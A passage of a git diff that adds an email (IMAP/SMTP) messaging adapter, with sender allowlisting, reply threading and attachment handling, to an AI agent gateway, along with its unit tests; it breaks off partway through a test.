+                in_reply_to = msg.get("In-Reply-To", "")
+                body = _extract_text_body(msg)
+                attachments = _extract_attachments(msg)
+
+                results.append({
+                    "uid": uid,
+                    "sender_addr": sender_addr,
+                    "sender_name": sender_name,
+                    "subject": subject,
+                    "message_id": message_id,
+                    "in_reply_to": in_reply_to,
+                    "body": body,
+                    "attachments": attachments,
+                    "date": msg.get("Date", ""),
+                })
+
+            imap.logout()
+        except Exception as e:
+            logger.error("[Email] IMAP fetch error: %s", e)
+        return results
+
+    async def _dispatch_message(self, msg_data: Dict[str, Any]) -> None:
+        """Convert a fetched email into a MessageEvent and dispatch it."""
+        sender_addr = msg_data["sender_addr"]
+
+        # Skip self-messages
+        if sender_addr == self._address.lower():
+            return
+
+        subject = msg_data["subject"]
+        body = msg_data["body"].strip()
+        attachments = msg_data["attachments"]
+
+        # Build message text: include subject as context
+        text = body
+        if subject and not subject.startswith("Re:"):
+            text = f"[Subject: {subject}]\n\n{body}"
+
+        # Determine message type and media
+        media_urls = []
+        media_types = []
+        msg_type = MessageType.TEXT
+
+        for att in attachments:
+            media_urls.append(att["path"])
+            media_types.append(att["media_type"])
+            if att["type"] == "image":
+                msg_type = MessageType.PHOTO
+
+        # Store thread context for reply threading
+        self._thread_context[sender_addr] = {
+            "subject": subject,
+            "message_id": msg_data["message_id"],
+        }
+
+        source = self.build_source(
+            chat_id=sender_addr,
+            chat_name=msg_data["sender_name"] or sender_addr,
+            chat_type="dm",
+            user_id=sender_addr,
+            user_name=msg_data["sender_name"] or sender_addr,
+        )
+
+        event = MessageEvent(
+            text=text or "(empty email)",
+            message_type=msg_type,
+            source=source,
+            message_id=msg_data["message_id"],
+            media_urls=media_urls,
+            media_types=media_types,
+            reply_to_message_id=msg_data["in_reply_to"] or None,
+        )
+
+        logger.info("[Email] New message from %s: %s", sender_addr, subject)
+        await self.handle_message(event)
+
+    async def send(
+        self,
+        chat_id: str,
+        content: str,
+        reply_to: Optional[str] = None,
+        metadata: Optional[Dict[str, Any]] = None,
+    ) -> SendResult:
+        """Send an email reply to the given address."""
+        try:
+            loop = asyncio.get_running_loop()
+            message_id = await loop.run_in_executor(
+                None, self._send_email, chat_id, content, reply_to
+            )
+            return SendResult(success=True, message_id=message_id)
+        except Exception as e:
+            logger.error("[Email] Send failed to %s: %s", chat_id, e)
+            return SendResult(success=False, error=str(e))
+
+    def _send_email(
+        self,
+        to_addr: str,
+        body: str,
+        reply_to_msg_id: Optional[str] = None,
+    ) -> str:
+        """Send an email via SMTP. Runs in executor thread."""
+        msg = MIMEMultipart()
+        msg["From"] = self._address
+        msg["To"] = to_addr
+
+        # Thread context for reply
+        ctx = self._thread_context.get(to_addr, {})
+        subject = ctx.get("subject", "Hermes Agent")
+        if not subject.startswith("Re:"):
+            subject = f"Re: {subject}"
+        msg["Subject"] = subject
+
+        # Threading headers
+        original_msg_id = reply_to_msg_id or ctx.get("message_id")
+        if original_msg_id:
+            msg["In-Reply-To"] = original_msg_id
+            msg["References"] = original_msg_id
+
+        msg_id = f"<hermes-{uuid.uuid4().hex[:12]}@{self._address.split('@')[1]}>"
+        msg["Message-ID"] = msg_id
+
+        msg.attach(MIMEText(body, "plain", "utf-8"))
+
+        smtp = smtplib.SMTP(self._smtp_host, self._smtp_port)
+        smtp.starttls()
+        smtp.login(self._address, self._password)
+        smtp.send_message(msg)
+        smtp.quit()
+
+        logger.info("[Email] Sent reply to %s (subject: %s)", to_addr, subject)
+        return msg_id
+
+    async def send_typing(self, chat_id: str) -> None:
+        """Email has no typing indicator — no-op."""
+        pass
+
+    async def send_image(
+        self,
+        chat_id: str,
+        image_url: str,
+        caption: Optional[str] = None,
+        reply_to: Optional[str] = None,
+    ) -> SendResult:
+        """Send an image URL as part of an email body."""
+        text = caption or ""
+        text += f"\n\nImage: {image_url}"
+        return await self.send(chat_id, text.strip(), reply_to)
+
+    async def send_document(
+        self,
+        chat_id: str,
+        file_path: str,
+        caption: Optional[str] = None,
+        file_name: Optional[str] = None,
+        reply_to: Optional[str] = None,
+    ) -> SendResult:
+        """Send a file as an email attachment."""
+        try:
+            loop = asyncio.get_running_loop()
+            message_id = await loop.run_in_executor(
+                None,
+                self._send_email_with_attachment,
+                chat_id,
+                caption or "",
+                file_path,
+                file_name,
+            )
+            return SendResult(success=True, message_id=message_id)
+        except Exception as e:
+            logger.error("[Email] Send document failed: %s", e)
+            return SendResult(success=False, error=str(e))
+
+    def _send_email_with_attachment(
+        self,
+        to_addr: str,
+        body: str,
+        file_path: str,
+        file_name: Optional[str] = None,
+    ) -> str:
+        """Send an email with a file attachment via SMTP."""
+        msg = MIMEMultipart()
+        msg["From"] = self._address
+        msg["To"] = to_addr
+
+        ctx = self._thread_context.get(to_addr, {})
+        subject = ctx.get("subject", "Hermes Agent")
+        if not subject.startswith("Re:"):
+            subject = f"Re: {subject}"
+        msg["Subject"] = subject
+
+        original_msg_id = ctx.get("message_id")
+        if original_msg_id:
+            msg["In-Reply-To"] = original_msg_id
+            msg["References"] = original_msg_id
+
+        msg_id = f"<hermes-{uuid.uuid4().hex[:12]}@{self._address.split('@')[1]}>"
+        msg["Message-ID"] = msg_id
+
+        if body:
+            msg.attach(MIMEText(body, "plain", "utf-8"))
+
+        # Attach file
+        p = Path(file_path)
+        fname = file_name or p.name
+        with open(p, "rb") as f:
+            part = MIMEBase("application", "octet-stream")
+            part.set_payload(f.read())
+            encoders.encode_base64(part)
+            part.add_header("Content-Disposition", f"attachment; filename={fname}")
+            msg.attach(part)
+
+        smtp = smtplib.SMTP(self._smtp_host, self._smtp_port)
+        smtp.starttls()
+        smtp.login(self._address, self._password)
+        smtp.send_message(msg)
+        smtp.quit()
+
+        return msg_id
+
+    async def get_chat_info(self, chat_id: str) -> Dict[str, Any]:
+        """Return basic info about the email chat."""
+        ctx = self._thread_context.get(chat_id, {})
+        return {
+            "name": chat_id,
+            "type": "dm",
+            "chat_id": chat_id,
+            "subject": ctx.get("subject", ""),
+        }
diff --git a/gateway/run.py b/gateway/run.py
index 63131dce..d91215a6 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -672,6 +672,13 @@ class GatewayRunner:
                 return None
             return HomeAssistantAdapter(config)
 
+        elif platform == Platform.EMAIL:
+            from gateway.platforms.email import EmailAdapter, check_email_requirements
+            if not check_email_requirements():
+                logger.warning("Email: EMAIL_ADDRESS, EMAIL_PASSWORD, EMAIL_IMAP_HOST, or EMAIL_SMTP_HOST not set")
+                return None
+            return EmailAdapter(config)
+
         return None
     
     def _is_user_authorized(self, source: SessionSource) -> bool:
@@ -701,6 +708,7 @@ class GatewayRunner:
             Platform.WHATSAPP: "WHATSAPP_ALLOWED_USERS",
             Platform.SLACK: "SLACK_ALLOWED_USERS",
             Platform.SIGNAL: "SIGNAL_ALLOWED_USERS",
+            Platform.EMAIL: "EMAIL_ALLOWED_USERS",
         }
         platform_allow_all_map = {
             Platform.TELEGRAM: "TELEGRAM_ALLOW_ALL_USERS",
@@ -708,6 +716,7 @@ class GatewayRunner:
             Platform.WHATSAPP: "WHATSAPP_ALLOW_ALL_USERS",
             Platform.SLACK: "SLACK_ALLOW_ALL_USERS",
             Platform.SIGNAL: "SIGNAL_ALLOW_ALL_USERS",
+            Platform.EMAIL: "EMAIL_ALLOW_ALL_USERS",
         }
 
         # Per-platform allow-all flag (e.g., DISCORD_ALLOW_ALL_USERS=true)
diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py
index 3d146546..26a8f598 100644
--- a/hermes_cli/gateway.py
+++ b/hermes_cli/gateway.py
@@ -518,6 +518,32 @@ _PLATFORMS = [
         "emoji": "📡",
         "token_var": "SIGNAL_HTTP_URL",
     },
+    {
+        "key": "email",
+        "label": "Email",
+        "emoji": "📧",
+        "token_var": "EMAIL_ADDRESS",
+        "setup_instructions": [
+            "1. Use a dedicated email account for your Hermes agent",
+            "2. For Gmail: enable 2FA, then create an App Password at",
+            "   https://myaccount.google.com/apppasswords",
+            "3. For other providers: use your email password or app-specific password",
+            "4. IMAP must be enabled on your email account",
+        ],
+        "vars": [
+            {"name": "EMAIL_ADDRESS", "prompt": "Email address", "password": False,
+             "help": "The email address Hermes will use (e.g., hermes@gmail.com)."},
+            {"name": "EMAIL_PASSWORD", "prompt": "Email password (or app password)", "password": True,
+             "help": "For Gmail, use an App Password (not your regular password)."},
+            {"name": "EMAIL_IMAP_HOST", "prompt": "IMAP host", "password": False,
+             "help": "e.g., imap.gmail.com for Gmail, outlook.office365.com for Outlook."},
+            {"name": "EMAIL_SMTP_HOST", "prompt": "SMTP host", "password": False,
+             "help": "e.g., smtp.gmail.com for Gmail, smtp.office365.com for Outlook."},
+            {"name": "EMAIL_ALLOWED_USERS", "prompt": "Allowed sender emails (comma-separated)", "password": False,
+             "is_allowlist": True,
+             "help": "Only emails from these addresses will be processed."},
+        ],
+    },
 ]
 
 
@@ -543,6 +569,15 @@ def _platform_status(platform: dict) -> str:
         if val or account:
             return "partially configured"
         return "not configured"
+    if platform.get("key") == "email":
+        pwd = get_env_value("EMAIL_PASSWORD")
+        imap = get_env_value("EMAIL_IMAP_HOST")
+        smtp = get_env_value("EMAIL_SMTP_HOST")
+        if all([val, pwd, imap, smtp]):
+            return "configured"
+        if any([val, pwd, imap, smtp]):
+            return "partially configured"
+        return "not configured"
     if val:
         return "configured"
     return "not configured"
diff --git a/hermes_cli/status.py b/hermes_cli/status.py
index f27824a6..971dad47 100644
--- a/hermes_cli/status.py
+++ b/hermes_cli/status.py
@@ -208,6 +208,7 @@ def show_status(args):
         "WhatsApp": ("WHATSAPP_ENABLED", None),
         "Signal": ("SIGNAL_HTTP_URL", "SIGNAL_HOME_CHANNEL"),
         "Slack": ("SLACK_BOT_TOKEN", None),
+        "Email": ("EMAIL_ADDRESS", "EMAIL_HOME_ADDRESS"),
     }
     
     for name, (token_var, home_var) in platforms.items():
diff --git a/tests/gateway/test_email.py b/tests/gateway/test_email.py
new file mode 100644
index 00000000..05cb11f5
--- /dev/null
+++ b/tests/gateway/test_email.py
@@ -0,0 +1,1034 @@
+"""Tests for the Email gateway platform adapter.
+
+Covers:
+1. Platform enum exists with correct value
+2. Config loading from env vars via _apply_env_overrides
+3. Adapter init and config parsing
+4. Helper functions (header decoding, body extraction, address extraction, HTML stripping)
+5. Authorization integration (platform in allowlist maps)
+6. Send message tool routing (platform in platform_map)
+7. check_email_requirements function
+8. Attachment extraction and caching
+9. Message dispatch and threading
+"""
+
+import os
+import unittest
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from email.mime.base import MIMEBase
+from email import encoders
+from pathlib import Path
+from types import SimpleNamespace
+from unittest.mock import patch, MagicMock, AsyncMock
+
+from gateway.platforms.base import SendResult
+
+
+class TestPlatformEnum(unittest.TestCase):
+    """Verify EMAIL is in the Platform enum."""
+
+    def test_email_in_platform_enum(self):
+        from gateway.config import Platform
+        self.assertEqual(Platform.EMAIL.value, "email")
+
+
+class TestConfigEnvOverrides(unittest.TestCase):
+    """Verify email config is loaded from environment variables."""
+
+    @patch.dict(os.environ, {
+        "EMAIL_ADDRESS": "hermes@test.com",
+        "EMAIL_PASSWORD": "secret",
+        "EMAIL_IMAP_HOST": "imap.test.com",
+        "EMAIL_SMTP_HOST": "smtp.test.com",
+    }, clear=False)
+    def test_email_config_loaded_from_env(self):
+        from gateway.config import GatewayConfig, Platform, _apply_env_overrides
+        config = GatewayConfig()
+        _apply_env_overrides(config)
+        self.assertIn(Platform.EMAIL, config.platforms)
+        self.assertTrue(config.platforms[Platform.EMAIL].enabled)
+        self.assertEqual(config.platforms[Platform.EMAIL].extra["address"], "hermes@test.com")
+
+    @patch.dict(os.environ, {
+        "EMAIL_ADDRESS": "hermes@test.com",
+        "EMAIL_PASSWORD": "secret",
+        "EMAIL_IMAP_HOST": "imap.test.com",
+        "EMAIL_SMTP_HOST": "smtp.test.com",
+        "EMAIL_HOME_ADDRESS": "user@test.com",
+    }, clear=False)
+    def test_email_home_channel_loaded(self):
+        from gateway.config import GatewayConfig, Platform, _apply_env_overrides
+        config = GatewayConfig()
+        _apply_env_overrides(config)
+        home = config.platforms[Platform.EMAIL].home_channel
+        self.assertIsNotNone(home)
+        self.assertEqual(home.chat_id, "user@test.com")
+
+    @patch.dict(os.environ, {}, clear=True)
+    def test_email_not_loaded_without_env(self):
+        from gateway.config import GatewayConfig, Platform, _apply_env_overrides
+        config = GatewayConfig()
+        _apply_env_overrides(config)
+        self.assertNotIn(Platform.EMAIL, config.platforms)
+
+    @patch.dict(os.environ, {
+        "EMAIL_ADDRESS": "hermes@test.com",
+        "EMAIL_PASSWORD": "secret",
+        "EMAIL_IMAP_HOST": "imap.test.com",
+        "EMAIL_SMTP_HOST": "smtp.test.com",
+    }, clear=False)
+    def test_email_in_connected_platforms(self):
+        from gateway.config import GatewayConfig, Platform, _apply_env_overrides
+        config = GatewayConfig()
+        _apply_env_overrides(config)
+        connected = config.get_connected_platforms()
+        self.assertIn(Platform.EMAIL, connected)
+
+
+class TestCheckRequirements(unittest.TestCase):
+    """Verify check_email_requirements function."""
+
+    @patch.dict(os.environ, {
+        "EMAIL_ADDRESS": "a@b.com",
+        "EMAIL_PASSWORD": "pw",
+        "EMAIL_IMAP_HOST": "imap.b.com",
+        "EMAIL_SMTP_HOST": "smtp.b.com",
+    }, clear=False)
+    def test_requirements_met(self):
+        from gateway.platforms.email import check_email_requirements
+        self.assertTrue(check_email_requirements())
+
+    @patch.dict(os.environ, {
+        "EMAIL_ADDRESS": "a@b.com",
+    }, clear=True)
+    def test_requirements_not_met(self):
+        from gateway.platforms.email import check_email_requirements
+        self.assertFalse(check_email_requirements())
+
+    @patch.dict(os.environ, {}, clear=True)
+    def test_requirements_empty_env(self):
+        from gateway.platforms.email import check_email_requirements
+        self.assertFalse(check_email_requirements())
+
+
+class TestHelperFunctions(unittest.TestCase):
+    """Test email parsing helper functions."""
+
+    def test_decode_header_plain(self):
+        from gateway.platforms.email import _decode_header_value
+        self.assertEqual(_decode_header_value("Hello World"), "Hello World")
+
+    def test_decode_header_encoded(self):
+        from gateway.platforms.email import _decode_header_value
+        # RFC 2047 encoded subject
+        encoded = "=?utf-8?B?TWVyaGFiYQ==?="  # "Merhaba" in base64
+        result = _decode_header_value(encoded)
+        self.assertEqual(result, "Merhaba")
+
+    def test_extract_email_address_with_name(self):
+        from gateway.platforms.email import _extract_email_address
+        self.assertEqual(
+            _extract_email_address("John Doe <john@example.com>"),
+            "john@example.com"
+        )
+
+    def test_extract_email_address_bare(self):
+        from gateway.platforms.email import _extract_email_address
+        self.assertEqual(
+            _extract_email_address("john@example.com"),
+            "john@example.com"
+        )
+
+    def test_extract_email_address_uppercase(self):
+        from gateway.platforms.email import _extract_email_address
+        self.assertEqual(
+            _extract_email_address("John@Example.COM"),
+            "john@example.com"
+        )
+
+    def test_strip_html_basic(self):
+        from gateway.platforms.email import _strip_html
+        html = "<p>Hello <b>world</b></p>"
+        result = _strip_html(html)
+        self.assertIn("Hello", result)
+        self.assertIn("world", result)
+        self.assertNotIn("<p>", result)
+        self.assertNotIn("<b>", result)
+
+    def test_strip_html_br_tags(self):
+        from gateway.platforms.email import _strip_html
+        html = "Line 1<br>Line 2<br/>Line 3"
+        result = _strip_html(html)
+        self.assertIn("Line 1", result)
+        self.assertIn("Line 2", result)
+
+    def test_strip_html_entities(self):
+        from gateway.platforms.email import _strip_html
+        html = "a &amp; b &lt; c &gt; d"
+        result = _strip_html(html)
+        self.assertIn("a & b", result)
+
+
+class TestExtractTextBody(unittest.TestCase):
+    """Test email body extraction from different message formats."""
+
+    def test_plain_text_body(self):
+        from gateway.platforms.email import _extract_text_body
+        msg = MIMEText("Hello, this is a test.", "plain", "utf-8")
+        result = _extract_text_body(msg)
+        self.assertEqual(result, "Hello, this is a test.")
+
+    def test_html_body_fallback(self):
+        from gateway.platforms.email import _extract_text_body
+        msg = MIMEText("<p>Hello from HTML</p>", "html", "utf-8")
+        result = _extract_text_body(msg)
+        self.assertIn("Hello from HTML", result)
+        self.assertNotIn("<p>", result)
+
+    def test_multipart_prefers_plain(self):
+        from gateway.platforms.email import _extract_text_body
+        msg = MIMEMultipart("alternative")
+        msg.attach(MIMEText("<p>HTML version</p>", "html", "utf-8"))
+        msg.attach(MIMEText("Plain version", "plain", "utf-8"))
+        result = _extract_text_body(msg)
+        self.assertEqual(result, "Plain version")
+
+    def test_multipart_html_only(self):
+        from gateway.platforms.email import _extract_text_body
+        msg = MIMEMultipart("alternative")
+        msg.attach(MIMEText("<p>Only HTML</p>", "html", "utf-8"))
+        result = _extract_text_body(msg)
+        self.assertIn("Only HTML", result)
+
+    def test_empty_body(self):
+        from gateway.platforms.email import _extract_text_body
+        msg = MIMEText("", "plain", "utf-8")
+        result = _extract_text_body(msg)
+        self.assertEqual(result, "")
+
+
+class TestExtractAttachments(unittest.TestCase):
+    """Test attachment extraction and caching."""
+
+    def test_no_attachments(self):
+        from gateway.platforms.email import _extract_attachments
+        msg = MIMEText("No attachments here.", "plain", "utf-8")
+        result = _extract_attachments(msg)
+        self.assertEqual(result, [])
+
+    @patch("gateway.platforms.email.cache_document_from_bytes")
+    def test_document_attachment(self, mock_cache):
+        from gateway.platforms.email import _extract_attachments
+        mock_cache.return_value = "/tmp/cached_doc.pdf"
+
+        msg = MIMEMultipart()
+        msg.attach(MIMEText("See attached.", "plain", "utf-8"))
+
+        part = MIMEBase("application", "pdf")
+        part.set_payload(b"%PDF-1.4 fake pdf content")
+        encoders.encode_base64(part)
+        part.add_header("Content-Disposition", "attachment; filename=report.pdf")
+        msg.attach(part)
+
+        result = _extract_attachments(msg)
+        self.assertEqual(len(result), 1)
+        self.assertEqual(result[0]["type"], "document")
+        self.assertEqual(result[0]["filename"], "report.pdf")
+        mock_cache.assert_called_once()
+
+    @patch("gateway.platforms.email.cache_image_from_bytes")
+    def test_image_attachment(self, mock_cache):
+        from gateway.platforms.email import _extract_attachments
+        mock_cache.return_value = "/tmp/cached_img.jpg"
+
+        msg = MIMEMultipart()
+        msg.attach(MIMEText("See photo.", "plain", "utf-8"))
+
+        part = MIMEBase("image", "jpeg")
+        part.set_payload(b"\xff\xd8\xff\xe0 fake jpg")
+        encoders.encode_base64(part)
+        part.add_header("Content-Disposition", "attachment; filename=photo.jpg")
+        msg.attach(part)
+
+        result = _extract_attachments(msg)
+        self.assertEqual(len(result), 1)
+        self.assertEqual(result[0]["type"], "image")
+        mock_cache.assert_called_once()
+
+
+class TestAuthorizationMaps(unittest.TestCase):
+    """Verify email is in authorization maps in gateway/run.py."""
+
+    def test_email_in_adapter_factory(self):
+        """Email adapter creation branch should exist."""
+        import gateway.run
+        import inspect
+        source = inspect.getsource(gateway.run.GatewayRunner._create_adapter)
+        self.assertIn("Platform.EMAIL", source)
+
+    def test_email_in_allowed_users_map(self):
+        """EMAIL_ALLOWED_USERS should be in platform_env_map."""
+        import gateway.run
+        import inspect
+        source = inspect.getsource(gateway.run.GatewayRunner._is_user_authorized)
+        self.assertIn("EMAIL_ALLOWED_USERS", source)
+
+    def test_email_in_allow_all_map(self):
+        """EMAIL_ALLOW_ALL_USERS should be in platform_allow_all_map."""
+        import gateway.run
+        import inspect
+        source = inspect.getsource(gateway.run.GatewayRunner._is_user_authorized)
+        self.assertIn("EMAIL_ALLOW_ALL_USERS", source)
+
+
+class TestSendMessageToolRouting(unittest.TestCase):
+    """Verify email routing in send_message_tool."""
+
+    def test_email_in_platform_map(self):
+        import tools.send_message_tool as smt
+        import inspect
+        source = inspect.getsource(smt._handle_send)
+        self.assertIn('"email"', source)
+
+    def test_send_to_platform_has_email_branch(self):
+        import tools.send_message_tool as smt
+        import inspect
+        source = inspect.getsource(smt._send_to_platform)
+        self.assertIn("Platform.EMAIL", source)
+
+
+class TestCronDelivery(unittest.TestCase):
+    """Verify email in cron scheduler platform_map."""
+
+    def test_email_in_cron_platform_map(self):
+        import cron.scheduler
+        import inspect
+        source = inspect.getsource(cron.scheduler)
+        self.assertIn('"email"', source)
+
+
+class TestToolset(unittest.TestCase):
+    """Verify email toolset is registered."""
+
+    def test_email_toolset_exists(self):
+        from toolsets import TOOLSETS
+        self.assertIn("hermes-email", TOOLSETS)
+
+    def test_email_in_gateway_toolset(self):
+        from toolsets import TOOLSETS
+        includes = TOOLSETS["hermes-gateway"]["includes"]
+        self.assertIn("hermes-email", includes)
+
+
+class TestPlatformHints(unittest.TestCase):
+    """Verify email platform hint is registered."""
+
+    def test_email_in_platform_hints(self):
+        from agent.prompt_builder import PLATFORM_HINTS
+        self.assertIn("email", PLATFORM_HINTS)
+        self.assertIn("email", PLATFORM_HINTS["email"].lower())
+
+
+class TestChannelDirectory(unittest.TestCase):
+    """Verify email in channel directory session-based discovery."""
+
+    def test_email_in_session_discovery(self):
+        import gateway.channel_directory
+        import inspect
+        source = inspect.getsource(gateway.channel_directory.build_channel_directory)
+        self.assertIn('"email"', source)
+
+
+class TestGatewaySetup(unittest.TestCase):
+    """Verify email in gateway setup wizard."""
+
+    def test_email_in_platforms_list(self):
+        from hermes_cli.gateway import _PLATFORMS
+        keys = [p["key"] for p in _PLATFORMS]
+        self.assertIn("email", keys)
+
+    def test_email_has_setup_vars(self):
+        from hermes_cli.gateway import _PLATFORMS
+        email_platform = next(p for p in _PLATFORMS if p["key"] == "email")
+        var_names = [v["name"] for v in email_platform["vars"]]
+        self.assertIn("EMAIL_ADDRESS", var_names)
+        self.assertIn("EMAIL_PASSWORD", var_names)
+        self.assertIn("EMAIL_IMAP_HOST", var_names)
+        self.assertIn("EMAIL_SMTP_HOST", var_names)
+
+
+class TestEnvExample(unittest.TestCase):
+    """Verify .env.example has email config."""
+
+    def test_env_example_has_email_vars(self):
+        env_path = Path(__file__).resolve().parents[2] / ".env.example"
+        content = env_path.read_text()
+        self.assertIn("EMAIL_ADDRESS", content)
+        self.assertIn("EMAIL_PASSWORD", content)
+        self.assertIn("EMAIL_IMAP_HOST", content)
+        self.assertIn("EMAIL_SMTP_HOST", content)
+
+
+class TestDispatchMessage(unittest.TestCase):
+    """Test email message dispatch logic."""
+
+    def _make_adapter(self):
+        """Create an EmailAdapter with mocked env vars."""
+        from gateway.config import PlatformConfig
+        with patch.dict(os.environ, {
+            "EMAIL_ADDRESS": "hermes@test.com",
+            "EMAIL_PASSWORD": "secret",
+            "EMAIL_IMAP_HOST": "imap.test.com",
+            "EMAIL_IMAP_PORT": "993",
+            "EMAIL_SMTP_HOST": "smtp.test.com",
+            "EMAIL_SMTP_PORT": "587",
+            "EMAIL_POLL_INTERVAL": "15",
+        }):
+            from gateway.platforms.email import EmailAdapter
+            adapter = EmailAdapter(PlatformConfig(enabled=True))
+        return adapter
+
+    def test_self_message_filtered(self):
+        """Messages from the agent's own address should be skipped."""
+        import asyncio
+        adapter = self._make_adapter()
+        adapter._message_handler = MagicMock()
+
+        msg_data = {
+            "uid": b"1",
+            "sender_addr": "hermes@test.com",
+            "sender_name": "Hermes",
+            "subject": "Test",
+            "message_id": "<msg1@test.com>",
+            "in_reply_to": "",
+            "body": "Self message",
+            "attachments": [],
+            "date": "",
+        }
+
+        asyncio.get_event_loop().run_until_complete(adapter._dispatch_message(msg_data))
+        adapter._message_handler.assert_not_called()
+
+    def test_subject_included_in_text(self):
+        """Subject should be prepended to body for non-reply emails."""
+        import asyncio
+        adapter = self._make_adapter()
+        captured_events = []
+
+        async def mock_handler(event):
+            captured_events.append(event)
+            return None
+
+        adapter._message_handler = mock_handler
+        # Override handle_message to capture the event directly
+        original_handle = adapter.handle_message
+
+        async def capture_handle(event):
+            captured_events.append(event)
+
+        adapter.handle_message = capture_handle
+
+        msg_data = {
+            "uid": b"2",
+            "sender_addr": "user@test.com",
+            "sender_name": "User",
+            "subject": "Help with Python",
+            "message_id": "<msg2@test.com>",
+            "in_reply_to": "",
+            "body": "How do I use lists?",
+            "attachments": [],
+            "date": "",
+        }
+
+        asyncio.get_event_loop().run_until_complete(adapter._dispatch_message(msg_data))
+        self.assertEqual(len(captured_events), 1)
+        self.assertIn("[Subject: Help with Python]", captured_events[0].text)
+        self.assertIn("How do I use lists?", captured_events[0].text)
+
+    def test_reply_subject_not_duplicated(self):
+        """Re: subjects should not be prepended to body."""
+        import asyncio
+        adapter = self._make_adapter()
+        captured_events = []
+
+        async def capture_handle(event):
+            captured_events.append(event)
+
+        adapter.handle_message = capture_handle
+
+        msg_data = {
+            "uid": b"3",
+            "sender_addr": "user@test.com",
+            "sender_name": "User",
+            "subject": "Re: Help with Python",
+            "message_id": "<msg3@test.com>",
+            "in_reply_to": "<msg2@test.com>",
+            "body": "Thanks for the help!",
+            "attachments": [],
+            "date": "",
+        }
+
+        asyncio.get_event_loop().run_until_complete(adapter._dispatch_message(msg_data))
+        self.assertEqual(len(captured_events), 1)
+        self.assertNotIn("[Subject:", captured_events[0].text)
+        self.assertEqual(captured_events[0].text, "Thanks for the help!")
+
+    def test_empty_body_handled(self):
+        """Email with no body should dispatch '(empty email)'."""
+        import asyncio
+        adapter = self._make_adapter()
+        captured_events = []
+
+        async def capture_handle(event):
+            captured_events.append(event)
+
+        adapter.handle_message = capture_handle
+
+        msg_data = {
+            "uid": b"4",
+            "sender_addr": "user@test.com",
+            "sender_name": "User",
+            "subject": "Re: test",
+            "message_id": "<msg4@test.com>",
+            "in_reply_to": "",
+            "body": "",
+            "attachments": [],
+            "date": "",
+        }
+
+        asyncio.get_event_loop().run_until_complete(adapter._dispatch_message(msg_data))
+        self.assertEqual(len(captured_events), 1)
+        self.assertIn("(empty email)", captured_events[0].text)
+
+    def test_image_attachment_sets_photo_type(self):
+        """Email with image attachment should set message type to PHOTO."""
+        import asyncio
+        from gateway.platforms.base import MessageType
+        adapter = self._make_adapter()
+        captured_events = []
+
+        async def capture_handle(event):
+            captured_events.append(event)
+
+        adapter.handle_message = capture_handle
+
+        msg_data = {
+            "uid": b"5",
+            "sender_addr": "user@test.com",
+            "sender_name": "User",
+            "subject": "Re: photo",
+            "message_id": "<msg5@test.com>",
+            "in_reply_to": "",
+            "body": "Check this photo",
+            "attachments": [{"path": "/tmp/img.jpg", "filename": "img.jpg", "type": "image", "media_type": "image/jpeg"}],
+            "date": "",
+        }
+
+        asyncio.get_event_loop().run_until_complete(adapter._dispatch_message(msg_data))
+        self.assertEqual(len(captured_events), 1)
+        self.assertEqual(captured_events[0].message_type, MessageType.PHOTO)
+        self.assertEqual(captured_events[0].media_urls, ["/tmp/img.jpg"])
+
+    def test_source_built_correctly(self):
+        """Session source should have correct chat_id and user info."""
+        import asyncio
+        adapter = self._make_adapter()
+        captured_events = []
+
+        async def capture_handle(event):
+            captured_events.append(event)
+
+        adapter.handle_message = capture_handle
+
+        msg_data = {
+            "uid": b"6",
+            "sender_addr": "john@example.com",
+            "sender_name": "John Doe",
+            "subject": "Re: hi",
+            "message_id": "<msg6@test.com>",
+            "in_reply_to": "",
+            "body": "Hello",
+            "attachments": [],
+            "date": "",
+        }
+
+        asyncio.get_event_loop().run_until_complete(adapter._dispatch_message(msg_data))
+        event = captured_events[0]
+        self.assertEqual(event.source.chat_id, "john@example.com")
+        self.assertEqual(event.source.user_id, "john@example.com")
+        self.assertEqual(event.source.user_name, "John Doe")
+        self.assertEqual(event.source.chat_type, "dm")
+
+
+class TestThreadContext(unittest.TestCase):
+    """Test email reply threading logic."""
+
+    def _make_adapter(self):
+        from gateway.config import PlatformConfig
+        with patch.dict(os.environ, {
+            "EMAIL_ADDRESS": "hermes@test.com",
+            "EMAIL_PASSWORD": "secret",
+            "EMAIL_IMAP_HOST": "imap.test.com",
+            "EMAIL_SMTP_HOST": "smtp.test.com",
+        }):
+            from gateway.platforms.email import EmailAdapter
+            adapter = EmailAdapter(PlatformConfig(enabled=True))
+        return adapter
+
+    def test_thread_context_stored_after_dispatch(self):
+        """After dispatching a message, thread context should be stored."""
+        import asyncio
+        adapter = self._make_adapter()
+
+        async def noop_handle(event):
+            pass
+
+        adapter.handle_message = noop_handle
+
+        msg_data = {
+            "uid": b"10",
+            "sender_addr": "user@test.com",
+            "sender_name": "User",
+            "subject": "Project question",
+            "message_id": "<original@test.com>",
+            "in_reply_to": "",
+            "body": "Hello",
+            "attachments": [],
+            "date": "",
+        }
+
+        asyncio.get_event_loop().run_until_complete(adapter._dispatch_message(msg_data))
+        ctx = adapter._thread_context.get("user@test.com")
+        self.assertIsNotNone(ctx)
+        self.assertEqual(ctx["subject"], "Project question")
+        self.assertEqual(ctx["message_id"], "<original@test.com>")
+
+    def test_reply_uses_re_prefix(self):
+        """Reply subject should have Re: prefix."""
+        adapter = self._make_adapter()
+        adapter._thread_context["user@test.com"] = {
+            "subject": "Project question",
+            "message_id": "<original@test.com>",
+        }
+
+        with patch("smtplib.SMTP") as mock_smtp:
+            mock_server = MagicMock()
+            mock_smtp.return_value = mock_server
+
+            adapter._send_email("user@test.com", "Here is the answer.", None)
+
+            # Check the sent message
+            send_call = mock_server.send_message.call_args[0][0]
+            self.assertEqual(send_call["Subject"], "Re: Project question")
+            self.assertEqual(send_call["In-Reply-To"], "<original@test.com>")
+            self.assertEqual(send_call["References"], "<original@test.com>")
+
+    def test_reply_does_not_double_re(self):
+        """If subject already has Re:, don't add another."""
+        adapter = self._make_adapter()
+        adapter._thread_context["user@test.com"] = {
+            "subject": "Re: Project question",
+            "message_id": "<reply@test.com>",
+        }
+
+        with patch("smtplib.SMTP") as mock_smtp:
+            mock_server = MagicMock()
+            mock_smtp.return_value = mock_server
+
+            adapter._send_email("user@test.com", "Follow up.", None)
+
+            send_call = mock_server.send_message.call_args[0][0]
+            self.assertEqual(send_call["Subject"], "Re: Project question")
+            self.assertFalse(send_call["Subject"].startswith("Re: Re:"))
+
+    def test_no_thread_context_uses_default_subject(self):
